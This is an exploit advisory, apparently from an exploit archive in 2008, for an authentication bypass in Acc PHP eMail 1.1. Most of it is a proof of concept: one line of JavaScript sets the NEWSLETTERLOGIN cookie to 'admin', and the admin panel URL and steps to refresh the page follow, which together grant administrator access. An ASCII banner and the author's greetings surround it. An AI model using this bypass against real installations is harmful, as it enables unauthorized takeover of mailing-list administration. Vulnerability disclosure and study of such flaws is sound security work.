[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Acc PHP eMail 1.1 Insecure Cookie Handling Vulnerability
# Published : 2008-11-03
# Author : Hakxer
# Previous Title : Acc Statistics 1.1Insecure Cookie Handling Vulnerability
# Next Title : MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability
###########################################################################
______ __ __ ______ __ ______
/ ____/___ / / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/ / / / / __ / __ / _ / ___/ ___/ / / / _ / __ `/ __ `__
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/__, / /_/ ____/____/__,_/___/_/ /____/ /_/ ___/__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap :Acc PHP eMail v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/mailinglist/
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
PoC : javascript:document.cookie="NEWSLETTERLOGIN=admin";
javascript:document.cookie="NEWSLETTERLOGIN=Hakxer";
[~] Admin panel
http://www.accscripts.com/mailinglist/demo/index.php
[~] Execute JS Code javascript:document.cookie="NEWSLETTERLOGIN=admin";
[~] Refresh
# Proud To be a Muslim #
#_=END=_#
# www.Syue.com [2008-11-03]